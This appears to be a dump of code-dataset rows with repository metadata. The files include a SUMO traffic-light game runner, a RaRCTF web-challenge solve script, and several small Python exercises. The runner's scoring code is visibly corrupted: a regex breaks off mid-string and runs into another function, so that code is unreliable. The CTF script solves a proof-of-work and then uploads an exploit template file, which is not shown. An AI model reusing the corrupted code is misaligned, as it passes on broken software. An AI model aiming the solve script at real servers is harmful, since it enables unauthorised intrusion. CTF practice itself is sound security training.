\"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9,"string":"9"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-12-09T02:12:39.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-02-18T00:15:28.000Z"},"max_forks_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_forks_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_forks_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-11-20T19:31:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-11-20T19:31:26.000Z"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo\n# Copyright (C) 2010-2020 German Aerospace Center (DLR) and others.\n# This program and the accompanying materials are made available under the\n# terms of the Eclipse Public License 2.0 which is available at\n# https://www.eclipse.org/legal/epl-2.0/\n# This Source Code may also be made available under the following Secondary\n# Licenses when the conditions for such availability set forth in the Eclipse\n# Public License 2.0 are satisfied: GNU General Public License, version 2\n# or later which is available at\n# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html\n# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later\n\n# @file runner.py\n# @author Michael Behrisch\n# @author Jakob Erdmann\n# @date 2010-01-30\n\n\"\"\"\nThis script runs the gaming GUI for the LNdW traffic light game.\nIt checks for possible scenarios in the current working directory\nand lets the user start them as a game. 
Furthermore it\nsaves highscores to local disc and to the central highscore server.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport subprocess\nimport sys\nimport re\nimport pickle\nimport glob\ntry:\n import Tkinter\nexcept ImportError:\n import tkinter as Tkinter\nfrom optparse import OptionParser\nfrom xml.dom import pulldom\nfrom collections import defaultdict\n\nSUMO_HOME = os.environ.get('SUMO_HOME',\n os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))\nsys.path.append(os.path.join(SUMO_HOME, 'tools'))\nimport sumolib # noqa\n\n\n_UPLOAD = False if \"noupload\" in sys.argv else True\n_SCOREFILE = \"scores.pkl\"\nif _UPLOAD:\n _TIMEOUT = 5\n _SCORESERVER = \"sumo.dlr.de\"\n _SCORESCRIPT = \"/scores.php?game=TLS&\"\n_DEBUG = True if \"debug\" in sys.argv else False\n_SCORES = 30\n\n_LANGUAGE_EN = {'title': 'Interactive Traffic Light',\n 'cross': 'Simple Junction',\n 'cross_demo': 'Simple Junction (Demo)',\n 'square': 'Four Junctions',\n 'grid6': 'Six Junctions',\n 'kuehne': 'Prof. Kühne',\n 'bs3d': '3D Junction Virtual World',\n 'bs3Dosm': '3D Junction OpenStreetMap',\n 'ramp': 'Highway Ramp',\n 'corridor': 'Corridor',\n 'A10KW': 'Highway Ramp A10',\n 'DRT': 'Demand Responsive Transport (new)',\n 'DRT2': 'DRT - Advanced (new)',\n 'DRT_demo': 'DRT - Demo',\n 'high': 'Highscore',\n 'reset': 'Reset Highscore',\n 'lang': 'Deutsch',\n 'quit': 'Quit',\n 'Highscore': 'Highscore',\n 'Congratulations': 'Congratulations!',\n 'your score': 'Your Score',\n 'Continue': 'Continue',\n }\n_LANGUAGE_DE = {'title': 'Interaktives Ampelspiel',\n 'cross': 'Einfache Kreuzung',\n 'cross_demo': 'Einfache Kreuzung (Demo)',\n 'square': 'Vier Kreuzungen',\n 'grid6': 'Sechs Kreuzungen',\n 'kuehne': 'Prof. 
Kühne',\n 'bs3d': '3D Forschungskreuzung Virtuelle Welt',\n 'bs3Dosm': '3D Forschungskreuzung OpenStreetMap',\n 'ramp': 'Autobahnauffahrt',\n 'A10KW': 'A10 KW',\n 'DRT': 'Bedarfsbus (neu)',\n 'DRT2': 'Bedarfsbus für Fortgeschrittene (neu)',\n 'DRT_demo': 'Bedarfsbus - Demo',\n 'corridor': 'Strecke',\n 'high': 'Bestenliste',\n 'reset': 'Bestenliste zurücksetzen',\n 'lang': 'Englisch',\n 'quit': 'Beenden',\n 'Highscore': 'Bestenliste',\n 'Congratulations': 'Gratulation!',\n 'your score': 'Deine Punkte',\n 'Continue': 'Weiter',\n }\n\n\ndef printDebug(*args):\n if _DEBUG:\n print(\"DEBUG:\", end=\" \")\n for message in args:\n print(message, end=\" \")\n print()\n\n\nif _UPLOAD:\n printDebug(\"import httplib...\")\n try:\n import httplib # noqa\n printDebug(\"SUCCESS\")\n except ImportError:\n printDebug(\"FAILED - disabling upload...\")\n _UPLOAD = False\nif _UPLOAD:\n print(\"Highscore upload is enabled. To disable call this script with 'noupload' argument.\")\nelse:\n print(\"Upload is disabled.\")\n\n\ndef computeScoreFromWaitingTime(gamename):\n totalDistance = 0\n totalFuel = 0\n totalArrived = 0\n totalWaitingTime = 0\n complete = True\n for line in open(os.path.join(base, \"%s.netstate.xml\" % start.category)):\n m = re.search('= 0:\n rideDuration += float(ride.duration)\n rideStarted += 1\n if float(ride.arrival) >= 0:\n rideFinished += 1\n\n rideCount += 1\n\n if rideCount == 0:\n return 0, 0, False\n else:\n avgWT = rideWaitingTime / rideCount\n avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted\n score = 5000 - int(avgWT + avgDur)\n if _DEBUG:\n print(\"rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s\" % (\n rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))\n return score, rideCount, True\n\n\ndef computeScoreSquare(gamename):\n rideWaitingTime = 0\n rideDuration = 0\n rideStarted = 0\n rideFinished = 0\n tripinfos = gamename + \".tripinfos.xml\"\n rideCount = 0\n for 
ride in sumolib.xml.parse(tripinfos, 'tripinfo'):\n if float(ride.waitingTime) < 0:\n if _DEBUG:\n print(\"negative waitingTime\")\n ride.waitingTime = 10000\n rideWaitingTime += float(ride.waitingTime)\n if ride.vType.startswith(\"ev\"):\n rideWaitingTime += 10 * float(ride.waitingTime)\n if float(ride.duration) >= 0:\n rideDuration += float(ride.duration)\n rideStarted += 1\n if float(ride.arrival) >= 0:\n rideFinished += 1\n\n rideCount += 1\n\n if rideCount == 0:\n return 0, 0, False\n else:\n avgWT = rideWaitingTime / rideCount\n avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted\n score = 1000 - int(avgWT + avgDur)\n if _DEBUG:\n print(\"rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s\" % (\n rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))\n return score, rideCount, True\n\n\n_SCORING_FUNCTION = defaultdict(lambda: computeScoreFromWaitingTime)\n_SCORING_FUNCTION.update({\n 'A10KW': computeScoreFromTimeLoss,\n 'DRT': computeScoreDRT,\n 'DRT2': computeScoreDRT,\n 'DRT_demo': computeScoreDRT,\n 'square': computeScoreSquare,\n})\n\n\ndef loadHighscore():\n if _UPLOAD:\n printDebug(\"try to load highscore from scoreserver...\")\n try:\n conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)\n conn.request(\"GET\", _SCORESCRIPT + \"top=\" + str(_SCORES))\n response = conn.getresponse()\n if response.status == httplib.OK:\n scores = {}\n for line in response.read().splitlines():\n category, values = line.split()\n scores[category] = _SCORES * [(\"\", \"\", -1.)]\n for idx, item in enumerate(values.split(':')):\n name, game, score = item.split(',')\n scores[category][idx] = (name, game, int(float(score)))\n printDebug(\"SUCCESS\")\n return scores\n except Exception:\n printDebug(\"FAILED\")\n\n try:\n return pickle.load(open(_SCOREFILE))\n except Exception:\n pass\n return {}\n\n\ndef parseEndTime(cfg):\n cfg_doc = pulldom.parse(cfg)\n for event, parsenode in cfg_doc:\n if 
event == pulldom.START_ELEMENT and parsenode.localName == 'end':\n return float(parsenode.getAttribute('value'))\n\n\nclass IMAGE:\n pass\n\n\nclass StartDialog(Tkinter.Frame):\n\n def __init__(self, parent, lang):\n Tkinter.Frame.__init__(self, parent)\n # variables for changing language\n self.parent = parent\n self._language_text = lang\n self.buttons = []\n # misc variables\n self.name = ''\n # setup gui\n self.parent.title(self._language_text['title'])\n self.parent.minsize(250, 50)\n self.category = None\n\n # we use a grid layout with 4 columns\n COL_DLRLOGO, COL_START, COL_HIGH, COL_SUMOLOGO = range(4)\n # there is one column for every config, +2 more columns for control\n # buttons\n configs = sorted(glob.glob(os.path.join(base, \"*.sumocfg\")))\n numButtons = len(configs) + 3\n # button dimensions\n bWidth_start = 30\n bWidth_high = 10\n bWidth_control = 41\n\n self.gametime = 0\n self.ret = 0\n # some pretty images\n Tkinter.Label(self, image=IMAGE.dlrLogo).grid(\n row=0, rowspan=numButtons, column=COL_DLRLOGO)\n Tkinter.Label(self, image=IMAGE.sumoLogo).grid(\n row=0, rowspan=numButtons, column=COL_SUMOLOGO)\n\n # 2 button for each config (start, highscore)\n for row, cfg in enumerate(configs):\n if \"bs3\" in cfg and not haveOSG:\n continue\n category = self.category_name(cfg)\n # lambda must make a copy of cfg argument\n button = Tkinter.Button(self, width=bWidth_start,\n command=lambda cfg=cfg: self.start_cfg(cfg))\n self.addButton(button, category)\n button.grid(row=row, column=COL_START)\n\n button = Tkinter.Button(self, width=bWidth_high,\n command=lambda cfg=cfg: ScoreDialog(self, [], None, self.category_name(cfg),\n self._language_text)\n ) # .grid(row=row, column=COL_HIGH)\n self.addButton(button, 'high')\n button.grid(row=row, column=COL_HIGH)\n\n # control buttons\n button = Tkinter.Button(\n self, width=bWidth_control, command=high.clear)\n self.addButton(button, 'reset')\n button.grid(row=numButtons - 3, column=COL_START, columnspan=2)\n\n 
button = Tkinter.Button(\n self, width=bWidth_control, command=sys.exit)\n self.addButton(button, 'quit')\n button.grid(row=numButtons - 1, column=COL_START, columnspan=2)\n\n button = Tkinter.Button(\n self, width=bWidth_control, command=lambda: self.change_language())\n self.addButton(button, 'lang')\n button.grid(row=numButtons - 2, column=COL_START, columnspan=2)\n\n self.grid()\n # The following three commands are needed so the window pops\n # up on top on Windows...\n self.parent.iconify()\n self.parent.update()\n self.parent.deiconify()\n\n def addButton(self, button, text):\n button[\"text\"] = self._language_text.get(text, text)\n self.buttons.append((text, button))\n\n def change_language(self):\n if self._language_text == _LANGUAGE_DE:\n self._language_text = _LANGUAGE_EN\n else:\n self._language_text = _LANGUAGE_DE\n for text, button in self.buttons:\n button[\"text\"] = self._language_text[text]\n\n def category_name(self, cfg):\n return os.path.basename(cfg)[:-8]\n\n def start_cfg(self, cfg):\n # remember which which cfg was launched\n self.category = self.category_name(cfg)\n if _DEBUG:\n print(\"starting\", cfg)\n self.gametime = parseEndTime(cfg)\n self.ret = subprocess.call(\n [guisimPath, \"-S\", \"-G\", \"-Q\", \"-c\", cfg, '-l', 'log',\n '--output-prefix', \"%s.\" % self.category,\n '--duration-log.statistics',\n '--tripinfo-output.write-unfinished'], stderr=sys.stderr)\n\n if _DEBUG:\n print(\"ended\", cfg)\n\n # compute score\n score, totalArrived, complete = _SCORING_FUNCTION[self.category](self.category)\n\n # parse switches\n switch = []\n lastProg = {}\n tlsfile = os.path.join(base, \"%s.tlsstate.xml\" % start.category)\n if os.path.exists(tlsfile):\n for line in open(tlsfile):\n m = re.search(r'tlsstate time=\"(\\d+(.\\d+)?)\" id=\"([^\"]*)\" programID=\"([^\"]*)\"', line)\n if m:\n tls = m.group(3)\n program = m.group(4)\n if tls not in lastProg or lastProg[tls] != program:\n lastProg[tls] = program\n switch += [m.group(3), 
m.group(1)]\n\n lang = start._language_text\n if _DEBUG:\n print(switch, score, totalArrived, complete)\n if complete:\n ScoreDialog(self, switch, score, self.category, lang)\n\n # if ret != 0:\n # quit on error\n # sys.exit(start.ret)\n\n\nclass ScoreDialog:\n\n def __init__(self, parent, switch, score, category, lang):\n self.root = Tkinter.Toplevel(parent)\n # self.root.transient(parent)\n self.name = None\n self.switch = switch\n self.score = score\n self.category = category\n self.root.title(lang[\"Highscore\"])\n self.root.minsize(250, 50)\n haveHigh = False\n\n if category not in high:\n high[category] = _SCORES * [(\"\", \"\", -1.)]\n idx = 0\n for n, g, p in high[category]:\n if not haveHigh and p < score:\n Tkinter.Label(\n self.root, text=(str(idx + 1) + '. ')).grid(row=idx)\n self.name = Tkinter.Entry(self.root)\n self.name.grid(row=idx, sticky=Tkinter.W, column=1)\n self.scoreLabel = Tkinter.Label(self.root, text=str(score),\n bg=\"pale green\").grid(row=idx, column=2)\n self.idx = idx\n haveHigh = True\n self.root.title(lang[\"Congratulations\"])\n idx += 1\n if p == -1 or idx == _SCORES:\n break\n Tkinter.Label(self.root, text=(str(idx + 1) + '. 
')).grid(row=idx)\n Tkinter.Label(self.root, text=n, padx=5).grid(\n row=idx, sticky=Tkinter.W, column=1)\n Tkinter.Label(self.root, text=str(p)).grid(row=idx, column=2)\n idx += 1\n if not haveHigh:\n if score is not None: # not called from the main menue\n Tkinter.Label(self.root, text=lang['your score'], padx=5,\n bg=\"indian red\").grid(row=idx, sticky=Tkinter.W, column=1)\n Tkinter.Label(self.root, text=str(score),\n bg=\"indian red\").grid(row=idx, column=2)\n idx += 1\n Tkinter.Button(self.root, text=lang[\"Continue\"], command=self.save).grid(\n row=idx, column=2)\n\n # add QR-code for LNDW\n Tkinter.Label(self.root, image=IMAGE.qrCode).grid(\n row=1, column=3, rowspan=22)\n\n self.root.grid()\n self.root.bind(\"\", self.save)\n # self.root.wait_visibility()\n # self.root.grab_set()\n if self.name:\n self.name.focus_set()\n # The following three commands are needed so the window pops\n # up on top on Windows...\n # self.root.iconify()\n # self.root.update()\n # self.root.deiconify()\n # self.root.mainloop()\n\n def save(self, event=None):\n if self.name and self.name.get():\n name = self.name.get()\n high[self.category].insert(\n self.idx, (name, self.switch, self.score))\n high[self.category].pop()\n self.name.destroy()\n self.name = None\n Tkinter.Label(self.root, text=name, padx=5,\n bg=\"pale green\").grid(row=self.idx, sticky=Tkinter.W, column=1)\n try:\n f = open(_SCOREFILE, 'w')\n pickle.dump(high, f)\n f.close()\n except Exception:\n pass\n\n if _UPLOAD:\n printDebug(\"try to upload score...\")\n try:\n conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)\n conn.request(\"GET\", _SCORESCRIPT + \"category=%s&name=%s&instance=%s&points=%s\" % (\n self.category, name, \"_\".join(self.switch), self.score))\n if _DEBUG:\n r1 = conn.getresponse()\n print(r1.status, r1.reason, r1.read())\n printDebug(\"SUCCESS\")\n except BaseException:\n printDebug(\"FAILED\")\n self.quit()\n\n def quit(self, event=None):\n self.root.destroy()\n\n\nstereoModes = 
(\n 'ANAGLYPHIC', 'QUAD_BUFFER', 'VERTICAL_SPLIT', 'HORIZONTAL_SPLIT')\noptParser = OptionParser()\noptParser.add_option(\"-s\", \"--stereo\", metavar=\"OSG_STEREO_MODE\",\n help=\"Defines the stereo mode to use for 3D output; unique prefix of %s\" % (\n \", \".join(stereoModes)))\noptions, args = optParser.parse_args()\n\nbase = os.path.dirname(sys.argv[0])\nhigh = loadHighscore()\n\n\nguisimPath = sumolib.checkBinary(\"sumo-gui\")\nhaveOSG = \"OSG\" in subprocess.check_output(sumolib.checkBinary(\"sumo\"), universal_newlines=True)\n\nif options.stereo:\n for m in stereoModes:\n if m.lower().startswith(options.stereo.lower()):\n os.environ[\"OSG_STEREO_MODE\"] = m\n os.environ[\"OSG_STEREO\"] = \"ON\"\n break\n\nlang = _LANGUAGE_EN\nif \"OSG_FILE_PATH\" in os.environ:\n os.environ[\"OSG_FILE_PATH\"] += os.pathsep + \\\n os.path.join(os.environ.get(\"SUMO_HOME\", \"\"), \"data\", \"3D\")\nelse:\n os.environ[\"OSG_FILE_PATH\"] = os.path.join(\n os.environ.get(\"SUMO_HOME\", \"\"), \"data\", \"3D\")\n\nroot = Tkinter.Tk()\nIMAGE.dlrLogo = Tkinter.PhotoImage(file='dlr.gif')\nIMAGE.sumoLogo = Tkinter.PhotoImage(file='sumo_logo.gif')\nIMAGE.qrCode = Tkinter.PhotoImage(file='qr_sumo.dlr.de.gif')\nstart = StartDialog(root, 
lang)\nroot.mainloop()\n"},"avg_line_length":{"kind":"number","value":36.3556701031,"string":"36.35567"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.5656221939,"string":"0.565622"}}},{"rowIdx":46377,"cells":{"hexsha":{"kind":"string","value":"c30b8b72f076c5457f9f0e8c230a44a9cc7a8e5f"},"size":{"kind":"number","value":1044,"string":"1,044"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_stars_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_issues_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"web/Electroplating/solve.py"},"max_forks_repo_name":{"kind":"string","value":"NoXLaw/RaRCTF2021-Challenges-Public"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1a1b094359b88f8ebbc83a6b26d27ffb2602458f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import requests\n\nimport hashlib\nimport uuid\nimport binascii\nimport os\nimport sys\n\ndef generate():\n return uuid.uuid4().hex[:4], uuid.uuid4().hex[:4]\n\ndef verify(prefix, suffix, answer, difficulty=6):\n hash = hashlib.sha256(prefix.encode() + answer.encode() + suffix.encode()).hexdigest()\n return hash.endswith(\"0\"*difficulty)\n\ndef solve(prefix, suffix, difficulty):\n while True:\n test = binascii.hexlify(os.urandom(4)).decode()\n if verify(prefix, suffix, test, difficulty):\n return test\n\nif len(sys.argv) < 2:\n print(\"Usage: solve.py http://host:port/\")\n exit()\n\ns = requests.Session()\nhost = sys.argv[1]\ndata = s.get(host + \"pow\").json()\nprint(\"Solving POW\")\nsolution = solve(data['pref'], data['suff'], 6)\nprint(f\"Solved: {solution}\")\n\ns.post(host + \"pow\", json={\"answer\": solution})\n\nr = s.post(host, files={\"file\": open('solve.htmlrs', 'rb')})\n# r = s.post(host, files={\"file\": open('src/template.htmlrs', 'rb')})\nprint(r.text)\ntry:\n print(r.text.split('\\n')[14])\nexcept:\n 
print(\"Blocked\")\n\n"},"avg_line_length":{"kind":"number","value":24.2790697674,"string":"24.27907"},"max_line_length":{"kind":"number","value":90,"string":"90"},"alphanum_fraction":{"kind":"number","value":0.6446360153,"string":"0.644636"}}},{"rowIdx":46378,"cells":{"hexsha":{"kind":"string","value":"c351dec159890595ef75075c3943491ddc436720"},"size":{"kind":"number","value":892,"string":"892"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_stars_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_stars_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_issues_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_issues_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/python/data-types/collections/default-dict.py"},"max_forks_repo_name":{"kind":"string","value":"rogeriosantosf/hacker-rank-profile"},"max_forks_repo_head_hexsha":{"kind":"string","value":"d4b9c131524d138c415e5c5de4e38c6b8c35dd77"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# In this challenge, you will be given 2 integers, m and n. \n# There are n words, which might repeat, in word group A. \n# There are m words belonging to word group B. \n# For each m words, check whether the word has appeared in group A or not. \n# Print the indices of each occurrence of m in group A. \n# If it does not appear, print -1.\n\nfrom collections import defaultdict\n\nif __name__ == '__main__':\n n, m = map(int, input().split())\n groups = defaultdict(list)\n\n for _ in range(n):\n groups['A'].append(input())\n\n for _ in range(m):\n groups['B'].append(input())\n\n for letter in groups['B']:\n if letter in groups['A']:\n occur = []\n for i in range(len(groups['A'])):\n if groups['A'][i] == letter:\n occur.append(i + 1)\n print(\" \".join(map(str, occur)))\n else:\n print(\"-1\")\n"},"avg_line_length":{"kind":"number","value":30.7586206897,"string":"30.758621"},"max_line_length":{"kind":"number","value":75,"string":"75"},"alphanum_fraction":{"kind":"number","value":0.5717488789,"string":"0.571749"}}},{"rowIdx":46379,"cells":{"hexsha":{"kind":"string","value":"6f50f82050e54f4868ea22dbd8655476c4e1c5f4"},"size":{"kind":"number","value":1619,"string":"1,619"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_stars_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_issues_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/data_structures/graphs/shortest_path_unweighted_graph.py"},"max_forks_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"content":{"kind":"string","value":"\"\"\"\nFind the shortest path between two nodes in an unweighted undirected graph. Remember this\nis about finding the shortest path, not the shortest distance. For shortest\ndistance you can simply calculate the level of nodes from the source vertex\nand that will give the answer. For shortest path, use the concept of parents of \nBellman-Ford algorithm.\n\nSimply do a BFS and keep track of parents of each node. 
Then recursively print the \nparents of destination node until the source node.\n\"\"\"\n\nfrom collections import defaultdict\n\nclass Graph:\n\n def __init__(self, vertices):\n self.vertices = vertices\n self.graph = defaultdict(list)\n\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n self.graph[v].append(u)\n\n \n def bfs(self, s):\n parent = [-1] * self.vertices\n visited = [False] * self.vertices\n visited[s] = True\n queue = []\n queue.append(s)\n\n while queue:\n s = queue.pop(0)\n\n for i in self.graph[s]:\n if visited[i] == False:\n queue.append(i)\n parent[i] = s\n visited[i] = True\n \n return parent\n\n \n def shortest_path(self, source, dest):\n parent = self.bfs(source)\n\n while True:\n print(dest, end=' ')\n dest = parent[dest]\n\n if dest == source:\n break\n\n\ng = Graph(8)\ng.add_edge(0, 1)\ng.add_edge(0, 3)\ng.add_edge(1, 2)\ng.add_edge(3, 4)\ng.add_edge(3, 7)\ng.add_edge(4, 5)\ng.add_edge(4, 6)\ng.add_edge(4, 7)\ng.add_edge(5, 6)\ng.add_edge(6, 7)\n\ng.shortest_path(0, 7)"},"avg_line_length":{"kind":"number","value":23.8088235294,"string":"23.808824"},"max_line_length":{"kind":"number","value":89,"string":"89"},"alphanum_fraction":{"kind":"number","value":0.5948116121,"string":"0.594812"}}},{"rowIdx":46380,"cells":{"hexsha":{"kind":"string","value":"48cd470862b5566406b88bf33d5cc16654b91e0a"},"size":{"kind":"number","value":302,"string":"302"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. 
return the quotient and remainder.py"},"max_stars_repo_name":{"kind":"string","value":"jaswinder9051998/Resources"},"max_stars_repo_head_hexsha":{"kind":"string","value":"fd468af37bf24ca57555d153ee64693c018e822e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":101,"string":"101"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-20T11:57:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-23T09:49:13.000Z"},"max_issues_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py"},"max_issues_repo_name":{"kind":"string","value":"Sid-1164/Resources"},"max_issues_repo_head_hexsha":{"kind":"string","value":"3987dcaeddc8825f9bc79609ff26094282b8ece1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-01-12T11:55:56.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-12T04:53:33.000Z"},"max_forks_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/3. return the quotient and remainder.py"},"max_forks_repo_name":{"kind":"string","value":"Sid-1164/Resources"},"max_forks_repo_head_hexsha":{"kind":"string","value":"3987dcaeddc8825f9bc79609ff26094282b8ece1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":38,"string":"38"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-01-12T11:56:16.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-23T10:07:52.000Z"},"content":{"kind":"string","value":"\"\"\"\n1. 
Write a function that accepts two integers num1 and num2. The function should divide num1 by num2\nand return the quotient and remainder. The output can be rounded to 2 decimal places.\n\"\"\"\n\n\ndef quot_rem(num1,num2):\n q = round((num1 / num2), 2)\n r = round((num1 % num2), 2)\n return (q,r)"},"avg_line_length":{"kind":"number","value":30.2,"string":"30.2"},"max_line_length":{"kind":"number","value":100,"string":"100"},"alphanum_fraction":{"kind":"number","value":0.6854304636,"string":"0.68543"}}},{"rowIdx":46381,"cells":{"hexsha":{"kind":"string","value":"d28c7a51f180fe4d9711b5cf099c91ea2d70c774"},"size":{"kind":"number","value":580,"string":"580"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"python/asyncio/tasks.py"},"max_stars_repo_name":{"kind":"string","value":"zeroam/TIL"},"max_stars_repo_head_hexsha":{"kind":"string","value":"43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 